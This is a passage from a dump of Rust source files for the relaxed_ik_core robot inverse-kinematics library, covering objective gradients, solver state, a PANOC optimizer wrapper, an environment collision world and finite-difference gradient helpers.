    // Indices of objectives deferred to the batched finite-diff sweep.
    let mut finite_diff_list: Vec<usize> = Vec::new();
    // Baseline value of every objective, index-aligned with `objectives`
    // (both branches below push exactly one entry per objective).
    let mut f_0s: Vec<f64> = Vec::new();
    let frames_0 = vars.robot.get_frames_immutable(x);
    for i in 0..self.objectives.len() {
        if self.objectives[i].gradient_type() == 0 {
            let (local_obj, local_grad) = self.objectives[i].gradient(x, vars, &frames_0);
            f_0s.push(local_obj);
            obj += self.weight_priors[i] * local_obj;
            for j in 0..local_grad.len() {
                grad[j] += self.weight_priors[i] * local_grad[j];
            }
        } else if self.objectives[i].gradient_type() == 1 {
            finite_diff_list.push(i);
            let local_obj = self.objectives[i].call(x, vars, &frames_0);
            obj += self.weight_priors[i] * local_obj;
            f_0s.push(local_obj);
        }
    }
    if finite_diff_list.len() > 0 {
        // One FK evaluation per dimension, reused by every deferred objective.
        for i in 0..x.len() {
            let mut x_h = x.to_vec();
            x_h[i] += 0.0000001;
            let frames_h = vars.robot.get_frames_immutable(x_h.as_slice());
            for j in &finite_diff_list {
                let f_h = self.objectives[*j].call(&x_h, vars, &frames_h);
                grad[i] += self.weight_priors[*j] * ((-f_0s[*j] + f_h) / 0.0000001);
            }
        }
    }
    (obj, grad)
}
/// Lite counterpart of `__gradient`, using end-effector poses only.
///
/// Fixes relative to the original:
/// * the branch conditions were inverted w.r.t. `gradient_type`'s contract
///   ("manual diff = 0, finite diff = 1") and w.r.t. `__gradient`: type-0
///   objectives now use their own `gradient_lite`, type-1 objectives are
///   batched into the shared finite-difference sweep;
/// * the sweep evaluated `call_lite` at the *unperturbed* `x` (only the
///   poses were perturbed), zeroing the gradient of any objective that
///   reads `x` directly (e.g. the smoothness terms); it now evaluates at
///   `x_h` exactly like `__gradient` does.
fn __gradient_lite(&self, x: &[f64], vars: &RelaxedIKVars) -> (f64, Vec<f64>) {
    let mut grad: Vec<f64> = vec![0. ; x.len()];
    let mut obj = 0.0;
    // Indices of objectives deferred to the batched finite-diff sweep.
    let mut finite_diff_list: Vec<usize> = Vec::new();
    // Baseline values, index-aligned with `objectives`.
    let mut f_0s: Vec<f64> = Vec::new();
    let poses_0 = vars.robot.get_ee_pos_and_quat_immutable(x);
    for i in 0..self.objectives.len() {
        if self.objectives[i].gradient_type() == 0 {
            let (local_obj, local_grad) = self.objectives[i].gradient_lite(x, vars, &poses_0);
            f_0s.push(local_obj);
            obj += self.weight_priors[i] * local_obj;
            for j in 0..local_grad.len() {
                grad[j] += self.weight_priors[i] * local_grad[j];
            }
        } else if self.objectives[i].gradient_type() == 1 {
            finite_diff_list.push(i);
            let local_obj = self.objectives[i].call_lite(x, vars, &poses_0);
            obj += self.weight_priors[i] * local_obj;
            f_0s.push(local_obj);
        }
    }
    if finite_diff_list.len() > 0 {
        // One pose evaluation per dimension, shared by all deferred terms.
        for i in 0..x.len() {
            let mut x_h = x.to_vec();
            x_h[i] += 0.0000001;
            let poses_h = vars.robot.get_ee_pos_and_quat_immutable(x_h.as_slice());
            for j in &finite_diff_list {
                let f_h = self.objectives[*j].call_lite(x_h.as_slice(), vars, &poses_h);
                grad[i] += self.weight_priors[*j] * ((-f_0s[*j] + f_h) / 0.0000001);
            }
        }
    }
    (obj, grad)
}
/// Finite-differences the whole (non-lite) objective at once with a
/// forward step of 1e-6.
fn __gradient_finite_diff(&self, x: &[f64], vars: &RelaxedIKVars) -> (f64, Vec<f64>) {
    // (The baseline was previously bound `mut` without being mutated.)
    let f_0 = self.call(x, vars);
    let grad = (0..x.len())
        .map(|i| {
            let mut x_h = x.to_vec();
            x_h[i] += 0.000001;
            (self.call(x_h.as_slice(), vars) - f_0) / 0.000001
        })
        .collect();
    (f_0, grad)
}
/// Finite-differences the whole lite objective at once.
///
/// The baseline previously went through `self.call`, which dispatches on
/// `self.lite`, while the perturbed evaluations used `__call_lite`
/// directly; with `lite == false` that mismatch would yield a garbage
/// gradient. Both now use `__call_lite`. (Current call sites only reach
/// here with `lite == true`, so observable behavior is unchanged.)
fn __gradient_finite_diff_lite(&self, x: &[f64], vars: &RelaxedIKVars) -> (f64, Vec<f64>) {
    let f_0 = self.__call_lite(x, vars);
    let grad = (0..x.len())
        .map(|i| {
            let mut x_h = x.to_vec();
            x_h[i] += 0.000001;
            (self.__call_lite(x_h.as_slice(), vars) - f_0) / 0.000001
        })
        .collect();
    (f_0, grad)
}
} | rust | MIT | 1c48d2ae408b4e024ee037641aac1e728267984e | 2026-01-04T20:21:47.335665Z | false |
uwgraphics/relaxed_ik_core | https://github.com/uwgraphics/relaxed_ik_core/blob/1c48d2ae408b4e024ee037641aac1e728267984e/src/groove/vars.rs | src/groove/vars.rs | use nalgebra::{UnitQuaternion, Vector3, Vector6, Quaternion, Point3};
use crate::spacetime::robot::Robot;
use crate::utils_rust::file_utils::{*};
use time::PreciseTime;
use std::ops::Deref;
use yaml_rust::{YamlLoader, Yaml};
use std::fs::File;
use std::io::prelude::*;
use wasm_bindgen::prelude::*;
use serde::{Serialize, Deserialize};
/// Constructor payload deserialized from the JavaScript side when building
/// the solver in WebAssembly.
#[derive(Serialize, Deserialize)]
pub struct VarsConstructorData {
    // pub urdf: String,
    // Radius used when approximating links as capsules for collision checks.
    pub link_radius:f64,
    // Base and end-effector link names, one entry per kinematic chain.
    pub base_links: Vec<String>,
    pub ee_links: Vec<String>,
    // Initial joint configuration (private: only read during construction).
    starting_config: Vec<f64>
}
/// Mutable state of the solver: robot model, goals, tolerances, and a short
/// history of solutions used by the smoothness objectives.
pub struct RelaxedIKVars {
    pub robot: Robot,
    // Configuration the solver resets to / started from.
    pub init_state: Vec<f64>,
    // Most recent solution.
    pub xopt: Vec<f64>,
    // Previous three solutions (newest to oldest), consumed by the
    // velocity/acceleration/jerk minimization terms.
    pub prev_state: Vec<f64>,
    pub prev_state2: Vec<f64>,
    pub prev_state3: Vec<f64>,
    // One goal pose per kinematic chain.
    pub goal_positions: Vec<Vector3<f64>>,
    pub goal_quats: Vec<UnitQuaternion<f64>>,
    // Per-chain 6-vector of allowed slack (3 translational, 3 rotational).
    pub tolerances: Vec<Vector6<f64>>,
    // End-effector poses at `init_state`, used for relative goal solving.
    pub init_ee_positions: Vec<Vector3<f64>>,
    pub init_ee_quats: Vec<UnitQuaternion<f64>>
}
impl RelaxedIKVars {
/// Loads solver variables from a YAML settings file on disk.
///
/// The file must provide `urdf`, `base_links` and `ee_links`; an optional
/// `starting_config` defaults to all zeros. Panics on missing files or
/// malformed settings (this is a startup path).
pub fn from_local_settings(path_to_setting: &str) -> Self {
    let path_to_src = get_path_to_src();
    let mut file = File::open(path_to_setting).unwrap();
    let mut contents = String::new();
    // (The byte count returned here was previously bound to an unused `res`.)
    file.read_to_string(&mut contents).unwrap();
    let docs = YamlLoader::load_from_str(contents.as_str()).unwrap();
    let settings = &docs[0];
    let path_to_urdf = path_to_src + "configs/urdfs/" + settings["urdf"].as_str().unwrap();
    println!("RelaxedIK is using below URDF file: {}", path_to_urdf);
    // Parsed only to validate the URDF early; the chain itself is unused.
    let _chain = k::Chain::<f64>::from_urdf_file(path_to_urdf.clone()).unwrap();
    let base_links_arr = settings["base_links"].as_vec().unwrap();
    let ee_links_arr = settings["ee_links"].as_vec().unwrap();
    let num_chains = base_links_arr.len();
    let mut base_links = Vec::new();
    let mut ee_links = Vec::new();
    let mut tolerances: Vec<Vector6<f64>> = Vec::new();
    for i in 0..num_chains {
        base_links.push(base_links_arr[i].as_str().unwrap().to_string());
        ee_links.push(ee_links_arr[i].as_str().unwrap().to_string());
        // Zero slack on every DoF until goals are set.
        tolerances.push(Vector6::new(0., 0., 0., 0., 0., 0.));
    }
    let urdf = &std::fs::read_to_string(path_to_urdf).unwrap();
    let robot = Robot::from_urdf(urdf, &base_links, &ee_links);
    let starting_config = if settings["starting_config"].is_badvalue() {
        println!("No starting config provided, using all zeros");
        vec![0.0; robot.num_dofs]
    } else {
        settings["starting_config"].as_vec().unwrap().iter().map(|val| val.as_f64().unwrap()).collect()
    };
    let mut init_ee_positions: Vec<Vector3<f64>> = Vec::new();
    let mut init_ee_quats: Vec<UnitQuaternion<f64>> = Vec::new();
    let pose = robot.get_ee_pos_and_quat_immutable(&starting_config);
    // One end-effector pose per configured chain is expected.
    assert!(pose.len() == num_chains);
    for i in 0..pose.len() {
        init_ee_positions.push(pose[i].0);
        init_ee_quats.push(pose[i].1);
    }
    RelaxedIKVars{robot, init_state: starting_config.clone(), xopt: starting_config.clone(),
        prev_state: starting_config.clone(), prev_state2: starting_config.clone(), prev_state3: starting_config.clone(),
        goal_positions: init_ee_positions.clone(), goal_quats: init_ee_quats.clone(), tolerances, init_ee_positions, init_ee_quats}
}
/// WebAssembly constructor: builds solver variables from deserialized JS
/// config data plus the URDF text (no filesystem access in the browser).
pub fn from_jsvalue( configs: VarsConstructorData, urdf: &str) -> Self {
    let num_chains = configs.base_links.len();
    let mut tolerances: Vec<Vector6<f64>> = Vec::new();
    for i in 0..num_chains {
        // Zero slack on every DoF of every chain until goals are set.
        tolerances.push(Vector6::new(0., 0., 0., 0., 0., 0.));
    }
    let robot = Robot::from_urdf(urdf, &configs.base_links, &configs.ee_links);
    let mut init_ee_positions: Vec<Vector3<f64>> = Vec::new();
    let mut init_ee_quats: Vec<UnitQuaternion<f64>> = Vec::new();
    let pose = robot.get_ee_pos_and_quat_immutable(&configs.starting_config);
    // One end-effector pose per configured chain is expected.
    assert!(pose.len() == num_chains);
    for i in 0..pose.len() {
        init_ee_positions.push(pose[i].0);
        init_ee_quats.push(pose[i].1);
    }
    RelaxedIKVars{robot, init_state: configs.starting_config.clone(), xopt: configs.starting_config.clone(),
        prev_state: configs.starting_config.clone(), prev_state2: configs.starting_config.clone(), prev_state3: configs.starting_config.clone(),
        goal_positions: init_ee_positions.clone(), goal_quats: init_ee_quats.clone(), tolerances, init_ee_positions, init_ee_quats}
}
/// Installs a new solution, shifting the state history one step back
/// (xopt -> prev_state -> prev_state2 -> prev_state3).
pub fn update(&mut self, xopt: Vec<f64>) {
    // std::mem::replace moves each vector down the history chain, reusing
    // the existing allocations instead of cloning all four vectors.
    self.prev_state3 = std::mem::replace(
        &mut self.prev_state2,
        std::mem::replace(
            &mut self.prev_state,
            std::mem::replace(&mut self.xopt, xopt),
        ),
    );
}
pub fn reset(&mut self, init_state: Vec<f64>) {
self.prev_state3 = init_state.clone();
self.prev_state2 = init_state.clone();
self.prev_state = init_state.clone();
self.xopt = init_state.clone();
self.init_state = init_state.clone();
let mut init_ee_positions: Vec<Vector3<f64>> = Vec::new();
let mut init_ee_quats: Vec<UnitQuaternion<f64>> = Vec::new();
let pose = self.robot.get_ee_pos_and_quat_immutable(&init_state);
for i in 0..pose.len() {
init_ee_positions.push(pose[i].0);
init_ee_quats.push(pose[i].1);
}
self.init_ee_positions = init_ee_positions.clone();
self.init_ee_quats = init_ee_quats.clone();
}
}
| rust | MIT | 1c48d2ae408b4e024ee037641aac1e728267984e | 2026-01-04T20:21:47.335665Z | false |
uwgraphics/relaxed_ik_core | https://github.com/uwgraphics/relaxed_ik_core/blob/1c48d2ae408b4e024ee037641aac1e728267984e/src/groove/groove.rs | src/groove/groove.rs | use crate::groove::gradient::{ForwardFiniteDiff, CentralFiniteDiff, GradientFinder, ForwardFiniteDiffImmutable, CentralFiniteDiffImmutable, GradientFinderImmutable};
use crate::groove::vars::{RelaxedIKVars};
use optimization_engine::{constraints::*, panoc::*, *};
use crate::groove::objective_master::ObjectiveMaster;
/// Thin wrapper around an OpEn (optimization-engine) PANOC solver with a
/// reusable cache sized for `dim` decision variables.
pub struct OptimizationEngineOpen {
    dim: usize,
    cache: PANOCCache
}
impl OptimizationEngineOpen {
    /// Creates a solver for `dim` joint variables, with a PANOC cache using
    /// tolerance 1e-14 and an LBFGS memory of 10.
    pub fn new(dim: usize) -> Self {
        // (The cache binding was previously `mut` without being mutated.)
        let cache = PANOCCache::new(dim, 1e-14, 10);
        OptimizationEngineOpen { dim, cache }
    }
    /// Minimizes the objective starting from (and writing back into) `x`,
    /// bounded by the robot's joint limits, for at most `max_iter` PANOC
    /// iterations with cost tolerance 5e-4.
    pub fn optimize(&mut self, x: &mut [f64], v: &RelaxedIKVars, om: &ObjectiveMaster, max_iter: usize) {
        // Gradient callback; the objective value returned alongside the
        // gradient is not needed here (it was previously bound unused).
        let df = |u: &[f64], grad: &mut [f64]| -> Result<(), SolverError> {
            let (_, my_grad) = om.gradient(u, v);
            for i in 0..my_grad.len() {
                grad[i] = my_grad[i];
            }
            Ok(())
        };
        // Cost callback.
        let f = |u: &[f64], c: &mut f64| -> Result<(), SolverError> {
            *c = om.call(u, v);
            Ok(())
        };
        // Box constraints from the robot's joint limits.
        let bounds = Rectangle::new(Option::from(v.robot.lower_joint_limits.as_slice()), Option::from(v.robot.upper_joint_limits.as_slice()));
        let problem = Problem::new(&bounds, df, f);
        let mut panoc = PANOCOptimizer::new(problem, &mut self.cache).with_max_iter(max_iter).with_tolerance(0.0005);
        // Solve in place. The status is deliberately ignored: on failure
        // `x` holds the last iterate and the caller screens it for NaNs.
        let _status = panoc.solve(x);
    }
}
| rust | MIT | 1c48d2ae408b4e024ee037641aac1e728267984e | 2026-01-04T20:21:47.335665Z | false |
uwgraphics/relaxed_ik_core | https://github.com/uwgraphics/relaxed_ik_core/blob/1c48d2ae408b4e024ee037641aac1e728267984e/src/groove/mod.rs | src/groove/mod.rs | pub mod objective;
pub mod groove;
pub mod vars;
pub mod gradient;
pub mod objective_master;
// pub mod env_collision; | rust | MIT | 1c48d2ae408b4e024ee037641aac1e728267984e | 2026-01-04T20:21:47.335665Z | false |
uwgraphics/relaxed_ik_core | https://github.com/uwgraphics/relaxed_ik_core/blob/1c48d2ae408b4e024ee037641aac1e728267984e/src/groove/env_collision.rs | src/groove/env_collision.rs | use crate::utils_rust::yaml_utils::EnvCollisionFileParser;
use nalgebra::{Vector3, Isometry3, Point3};
use nalgebra::geometry::{Translation3, UnitQuaternion, Quaternion};
use ncollide3d::pipeline::{*};
use ncollide3d::shape::{*};
use std::collections::BTreeMap;
/// Per-collision-object metadata distinguishing robot links from obstacles.
#[derive(Clone, Debug)]
pub struct LinkData {
    /// True when this collision object is a robot link (as opposed to an environment obstacle).
    pub is_link: bool,
    /// Index of the arm/chain the link belongs to; -1 for non-link objects.
    pub arm_idx: i32,
}
impl LinkData {
    /// Creates link metadata for a collision object.
    pub fn new(is_link: bool, arm_idx: i32) -> LinkData {
        Self { is_link, arm_idx }
    }
}
/// User data attached to every object in the collision world: a display name
/// plus link/obstacle metadata.
#[derive(Clone, Debug)]
pub struct CollisionObjectData {
    /// Human-readable identifier (link label or obstacle name from the env file).
    pub name: String,
    /// Link/obstacle metadata for this object.
    pub link_data: LinkData,
}
impl CollisionObjectData {
    /// Creates the user data stored on a collision object.
    pub fn new(name: String, link_data: LinkData) -> CollisionObjectData {
        Self { name, link_data }
    }
}
/// Collision world plus the bookkeeping needed to track proximity between
/// robot-link segments and environment obstacles.
pub struct RelaxedIKEnvCollision {
    // World holding both robot-link segments and environment obstacles.
    pub world: CollisionWorld<f64, CollisionObjectData>,
    // Radius used to scale the proximity-query margin around link segments.
    pub link_radius: f64,
    // Per-arm handles of the segment objects representing the robot's links.
    pub link_handles: Vec<Vec<CollisionObjectSlabHandle>>,
    // Handles (and names) of obstacles that may move at runtime.
    pub dyn_obstacle_handles: Vec<(CollisionObjectSlabHandle, String)>,
    // Per-arm map from a link handle to obstacle handles — presumably the pairs
    // currently in proximity; populated elsewhere (TODO confirm against callers).
    pub active_pairs: Vec<BTreeMap<CollisionObjectSlabHandle, Vec<CollisionObjectSlabHandle>>>,
    // Per-arm, per-link (obstacle handle, score) — presumably the closest active
    // obstacle per link; populated elsewhere (TODO confirm against callers).
    pub active_obstacles: Vec<Vec<(Option<CollisionObjectSlabHandle>, f64)>>,
}
impl RelaxedIKEnvCollision {
    /// Builds the collision world from the parsed environment file and the
    /// arms' initial joint frames.
    ///
    /// Robot links are added as line segments in collision group 1, which may
    /// only interact with obstacles (group 2); obstacles may only interact with
    /// links. Proximity events fire within `20.0 * link_radius` of an object.
    pub fn init_collision_world (
        env_collision_file: EnvCollisionFileParser,
        frames: &Vec<(Vec<nalgebra::Vector3<f64>>, Vec<nalgebra::UnitQuaternion<f64>>)>,
    ) -> Self {
        let link_radius = env_collision_file.robot_link_radius;
        let plane_obstacles = env_collision_file.cuboids;
        let sphere_obstacles = env_collision_file.spheres;
        let pcd_obstacles = env_collision_file.pcds;

        // The links are part of group 1 and can only interact with obstacles.
        let mut link_groups = CollisionGroups::new();
        link_groups.set_membership(&[1]);
        link_groups.set_blacklist(&[1]);
        link_groups.set_whitelist(&[2]);

        // All the other objects are part of group 2 and interact only with the links.
        let mut others_groups = CollisionGroups::new();
        others_groups.set_membership(&[2]);
        others_groups.set_blacklist(&[2]);
        others_groups.set_whitelist(&[1]);

        let proximity_query = GeometricQueryType::Proximity(20.0 * link_radius);
        let mut world = CollisionWorld::new(0.0);

        // One segment collision object per consecutive pair of joint frames, per arm.
        let mut link_handles: Vec<Vec<CollisionObjectSlabHandle>> = Vec::new();
        let mut active_pairs: Vec<BTreeMap<CollisionObjectSlabHandle, Vec<CollisionObjectSlabHandle>>> = Vec::new();
        let mut active_obstacles: Vec<Vec<(Option<CollisionObjectSlabHandle>, f64)>> = Vec::new();
        for arm_idx in 0..frames.len() {
            let mut handles: Vec<CollisionObjectSlabHandle> = Vec::new();
            let mut obstacles: Vec<(Option<CollisionObjectSlabHandle>, f64)> = Vec::new();
            let pair: BTreeMap<CollisionObjectSlabHandle, Vec<CollisionObjectSlabHandle>> = BTreeMap::new();
            let last_elem = frames[arm_idx].0.len() - 1;
            for i in 0..last_elem {
                let start_pt = Point3::from(frames[arm_idx].0[i]);
                let end_pt = Point3::from(frames[arm_idx].0[i + 1]);
                let segment = ShapeHandle::new(Segment::new(start_pt, end_pt));
                let segment_pos = nalgebra::one();
                let link_data = CollisionObjectData::new(format!("Link {}", i), LinkData::new(true, arm_idx as i32));
                let handle = world.add(segment_pos, segment, link_groups, proximity_query, link_data);
                handles.push(handle.0);
                obstacles.push((None, 0.0));
            }
            link_handles.push(handles);
            active_pairs.push(pair);
            active_obstacles.push(obstacles);
        }

        let mut dyn_obstacle_handles: Vec<(CollisionObjectSlabHandle, String)> = Vec::new();

        // Cuboid ("plane") obstacles: oriented boxes placed by translation + Euler angles.
        for plane_obs in &plane_obstacles {
            let half_extents = Vector3::new(plane_obs.x_halflength, plane_obs.y_halflength, plane_obs.z_halflength);
            let plane = ShapeHandle::new(Cuboid::new(half_extents));
            let plane_ts = Translation3::new(plane_obs.tx, plane_obs.ty, plane_obs.tz);
            let plane_rot = UnitQuaternion::from_euler_angles(plane_obs.rx, plane_obs.ry, plane_obs.rz);
            let plane_pos = Isometry3::from_parts(plane_ts, plane_rot);
            let plane_data = CollisionObjectData::new(plane_obs.name.clone(), LinkData::new(false, -1));
            let plane_handle = world.add(plane_pos, plane, others_groups, proximity_query, plane_data);
            if plane_obs.is_dynamic {
                dyn_obstacle_handles.push((plane_handle.0, plane_handle.1.data().name.clone()));
            }
        }

        // Sphere obstacles: balls placed by translation only (rotation is irrelevant).
        for sphere_obs in &sphere_obstacles {
            let sphere = ShapeHandle::new(Ball::new(sphere_obs.radius));
            let sphere_ts = Translation3::new(sphere_obs.tx, sphere_obs.ty, sphere_obs.tz);
            let sphere_rot = UnitQuaternion::identity();
            let sphere_pos = Isometry3::from_parts(sphere_ts, sphere_rot);
            let sphere_data = CollisionObjectData::new(sphere_obs.name.clone(), LinkData::new(false, -1));
            let sphere_handle = world.add(sphere_pos, sphere, others_groups, proximity_query, sphere_data);
            if sphere_obs.is_dynamic {
                dyn_obstacle_handles.push((sphere_handle.0, sphere_handle.1.data().name.clone()));
            }
        }

        // Point-cloud obstacles: approximated by the convex hull of the points
        // (cheaper than one compound shape per point).
        for pcd_obs in &pcd_obstacles {
            let mut points: Vec<Point3<f64>> = Vec::new();
            for sphere_obs in &pcd_obs.points {
                points.push(Point3::new(sphere_obs.tx, sphere_obs.ty, sphere_obs.tz));
            }
            let pcd = ShapeHandle::new(ConvexHull::try_from_points(&points).unwrap());
            let pcd_ts = Translation3::new(pcd_obs.tx, pcd_obs.ty, pcd_obs.tz);
            let pcd_rot = UnitQuaternion::from_euler_angles(pcd_obs.rx, pcd_obs.ry, pcd_obs.rz);
            let pcd_pos = Isometry3::from_parts(pcd_ts, pcd_rot);
            let pcd_data = CollisionObjectData::new(pcd_obs.name.clone(), LinkData::new(false, -1));
            let pcd_handle = world.add(pcd_pos, pcd, others_groups, proximity_query, pcd_data);
            if pcd_obs.is_dynamic {
                dyn_obstacle_handles.push((pcd_handle.0, pcd_handle.1.data().name.clone()));
            }
        }

        Self { world, link_radius, link_handles, dyn_obstacle_handles, active_pairs, active_obstacles }
    }

    /// Re-shapes every link segment to match the given joint frames (called
    /// after each forward-kinematics update).
    pub fn update_links(
        &mut self,
        frames: &Vec<(Vec<nalgebra::Vector3<f64>>, Vec<nalgebra::UnitQuaternion<f64>>)>,
    ) {
        for arm_idx in 0..frames.len() {
            let last_elem = frames[arm_idx].0.len() - 1;
            for i in 0..last_elem {
                let start_pt = Point3::from(frames[arm_idx].0[i]);
                let end_pt = Point3::from(frames[arm_idx].0[i + 1]);
                let segment = ShapeHandle::new(Segment::new(start_pt, end_pt));
                let link = self.world.objects.get_mut(self.link_handles[arm_idx][i]).unwrap();
                link.set_shape(segment);
            }
        }
    }

    /// Moves the dynamic obstacle registered under `name` to `position`.
    /// Unknown names are silently ignored.
    pub fn update_dynamic_obstacle(
        &mut self,
        name: &str,
        position: Isometry3<f64>,
    ) {
        for (handle, id) in &self.dyn_obstacle_handles {
            if id == name {
                let co = self.world.objects.get_mut(*handle).unwrap();
                co.set_position(position);
                break;
            }
        }
    }
}
| rust | MIT | 1c48d2ae408b4e024ee037641aac1e728267984e | 2026-01-04T20:21:47.335665Z | false |
uwgraphics/relaxed_ik_core | https://github.com/uwgraphics/relaxed_ik_core/blob/1c48d2ae408b4e024ee037641aac1e728267984e/src/groove/gradient.rs | src/groove/gradient.rs |
/// Finite-difference gradient estimation over an objective closure that can be
/// evaluated without mutating captured state (`Fn`).
pub trait GradientFinderImmutable<F>
    where F: Fn(&[f64]) -> f64 {
    /// Creates a finder for a `dim`-dimensional input.
    fn new(dim: usize, f: F) -> Self;
    /// Computes the gradient at `x` into the internal `out_grad` buffer.
    fn compute_gradient(&mut self, x: &[f64]);
    /// Computes the gradient at `x` and returns a copy of it.
    fn compute_and_return_gradient(&mut self, x: &[f64]) -> Vec<f64>;
    /// Computes the gradient at `x` without touching internal scratch buffers
    /// (allocates fresh perturbation vectors instead).
    fn compute_gradient_immutable(&self, x: &[f64]) -> Vec<f64>;
    /// Resets the internal perturbation buffers to `x`.
    fn reset(&mut self, x: &[f64]);
}
/// First-order forward finite difference: g_i ≈ (f(x + h·e_i) − f(x)) / h.
/// Needs `dim + 1` function evaluations per gradient.
pub struct ForwardFiniteDiffImmutable<F>
    where F: Fn(&[f64]) -> f64
{
    pub dim: usize,
    pub f: F,
    /// Perturbation step size.
    pub h: f64,
    /// Result buffer filled by the last `compute_gradient` call.
    pub out_grad: Vec<f64>,
    __x_h: Vec<f64> // scratch: x with one coordinate perturbed by +h
}

impl<F> GradientFinderImmutable<F> for ForwardFiniteDiffImmutable<F>
    where F: Fn(&[f64]) -> f64
{
    fn new(dim: usize, f: F) -> Self {
        ForwardFiniteDiffImmutable {
            dim,
            f,
            h: 0.00001,
            out_grad: vec![0.0; dim],
            __x_h: vec![0.0; dim],
        }
    }

    fn compute_gradient(&mut self, x: &[f64]) {
        // One baseline evaluation, then one perturbed evaluation per coordinate.
        let val_0 = (self.f)(x);
        for i in 0..x.len() {
            self.reset(x);
            self.__x_h[i] += self.h;
            self.out_grad[i] = (-val_0 + (self.f)(&self.__x_h)) / self.h;
        }
    }

    fn compute_and_return_gradient(&mut self, x: &[f64]) -> Vec<f64> {
        self.compute_gradient(x);
        self.out_grad.clone()
    }

    fn compute_gradient_immutable(&self, x: &[f64]) -> Vec<f64> {
        let mut out: Vec<f64> = Vec::with_capacity(x.len());
        let val_0 = (self.f)(x);
        for i in 0..x.len() {
            let mut x_h = x.to_vec();
            x_h[i] += self.h;
            out.push((-val_0 + (self.f)(x_h.as_slice())) / self.h);
        }
        out
    }

    fn reset(&mut self, x: &[f64]) {
        self.__x_h[..self.dim].copy_from_slice(&x[..self.dim]);
    }
}
/// Second-order central finite difference:
/// g_i ≈ (f(x + h·e_i) − f(x − h·e_i)) / (2h).
/// Needs `2 · dim` function evaluations per gradient.
pub struct CentralFiniteDiffImmutable<F>
    where F: Fn(&[f64]) -> f64
{
    pub dim: usize,
    pub f: F,
    /// Perturbation step size.
    pub h: f64,
    /// Result buffer filled by the last `compute_gradient` call.
    pub out_grad: Vec<f64>,
    __x_hf: Vec<f64>, // scratch: x perturbed forward  (+h)
    __x_hb: Vec<f64>  // scratch: x perturbed backward (−h)
}

impl<F> GradientFinderImmutable<F> for CentralFiniteDiffImmutable<F>
    where F: Fn(&[f64]) -> f64
{
    fn new(dim: usize, f: F) -> Self {
        CentralFiniteDiffImmutable {
            dim,
            f,
            h: 0.0001,
            out_grad: vec![0.0; dim],
            __x_hf: vec![0.0; dim],
            __x_hb: vec![0.0; dim],
        }
    }

    fn compute_gradient(&mut self, x: &[f64]) {
        for i in 0..x.len() {
            self.reset(x);
            self.__x_hf[i] += self.h;
            self.__x_hb[i] -= self.h;
            self.out_grad[i] = (-0.5 * (self.f)(&self.__x_hb) + 0.5 * (self.f)(&self.__x_hf)) / self.h;
        }
    }

    fn compute_and_return_gradient(&mut self, x: &[f64]) -> Vec<f64> {
        self.compute_gradient(x);
        self.out_grad.clone()
    }

    fn compute_gradient_immutable(&self, x: &[f64]) -> Vec<f64> {
        let mut out: Vec<f64> = Vec::with_capacity(x.len());
        for i in 0..x.len() {
            let mut x_hf = x.to_vec();
            let mut x_hb = x.to_vec();
            x_hf[i] += self.h;
            x_hb[i] -= self.h;
            out.push((-0.5 * (self.f)(x_hb.as_slice()) + 0.5 * (self.f)(x_hf.as_slice())) / self.h);
        }
        out
    }

    fn reset(&mut self, x: &[f64]) {
        self.__x_hf[..self.dim].copy_from_slice(&x[..self.dim]);
        self.__x_hb[..self.dim].copy_from_slice(&x[..self.dim]);
    }
}
/// Fourth-order central finite difference (five-point stencil, center unused):
/// g_i ≈ [f(x−2h·e_i)/12 − 2f(x−h·e_i)/3 + 2f(x+h·e_i)/3 − f(x+2h·e_i)/12] / h.
/// Needs `4 · dim` function evaluations per gradient.
pub struct CentralFiniteDiff2Immutable<F>
    where F: Fn(&[f64]) -> f64
{
    pub dim: usize,
    pub f: F,
    /// Perturbation step size.
    pub h: f64,
    /// Result buffer filled by the last `compute_gradient` call.
    pub out_grad: Vec<f64>,
    __x_hf1: Vec<f64>, // scratch: x perturbed by +h
    __x_hb1: Vec<f64>, // scratch: x perturbed by −h
    __x_hf2: Vec<f64>, // scratch: x perturbed by +2h
    __x_hb2: Vec<f64>  // scratch: x perturbed by −2h
}

impl<F> GradientFinderImmutable<F> for CentralFiniteDiff2Immutable<F>
    where F: Fn(&[f64]) -> f64
{
    fn new(dim: usize, f: F) -> Self {
        CentralFiniteDiff2Immutable {
            dim,
            f,
            h: 0.0001,
            out_grad: vec![0.0; dim],
            __x_hf1: vec![0.0; dim],
            __x_hb1: vec![0.0; dim],
            __x_hf2: vec![0.0; dim],
            __x_hb2: vec![0.0; dim],
        }
    }

    fn compute_gradient(&mut self, x: &[f64]) {
        for i in 0..x.len() {
            self.reset(x);
            self.__x_hf1[i] += self.h;
            self.__x_hb1[i] -= self.h;
            self.__x_hf2[i] += 2.0*self.h;
            self.__x_hb2[i] -= 2.0*self.h;
            self.out_grad[i] = ((1. / 12.) * (self.f)(&self.__x_hb2) + -(2. / 3.) * (self.f)(&self.__x_hb1) + (2. / 3.) * (self.f)(&self.__x_hf1) - (1. / 12.) * (self.f)(&self.__x_hf2)) / self.h;
        }
    }

    fn compute_and_return_gradient(&mut self, x: &[f64]) -> Vec<f64> {
        self.compute_gradient(x);
        self.out_grad.clone()
    }

    fn compute_gradient_immutable(&self, x: &[f64]) -> Vec<f64> {
        let mut out: Vec<f64> = Vec::with_capacity(x.len());
        for i in 0..x.len() {
            let mut x_hf1 = x.to_vec();
            let mut x_hb1 = x.to_vec();
            let mut x_hf2 = x.to_vec();
            let mut x_hb2 = x.to_vec();
            x_hf1[i] += self.h;
            x_hb1[i] -= self.h;
            x_hf2[i] += 2.0*self.h;
            x_hb2[i] -= 2.0*self.h;
            out.push( ((1. / 12.) * (self.f)(x_hb2.as_slice()) + -(2. / 3.) * (self.f)(x_hb1.as_slice()) + (2. / 3.) * (self.f)(x_hf1.as_slice()) - (1. / 12.) * (self.f)(x_hf2.as_slice())) / self.h);
        }
        out
    }

    fn reset(&mut self, x: &[f64]) {
        self.__x_hf1[..self.dim].copy_from_slice(&x[..self.dim]);
        self.__x_hb1[..self.dim].copy_from_slice(&x[..self.dim]);
        self.__x_hf2[..self.dim].copy_from_slice(&x[..self.dim]);
        self.__x_hb2[..self.dim].copy_from_slice(&x[..self.dim]);
    }
}
/// Finite-difference gradient estimation over an objective closure that may
/// mutate captured state (`FnMut`). Unlike `GradientFinderImmutable`, no
/// scratch-free `compute_gradient_immutable` variant is possible here.
pub trait GradientFinder<F>
    where F: FnMut(&[f64]) -> f64 {
    /// Creates a finder for a `dim`-dimensional input.
    fn new(dim: usize, f: F) -> Self;
    /// Computes the gradient at `x` into the internal `out_grad` buffer.
    fn compute_gradient(&mut self, x: &[f64]);
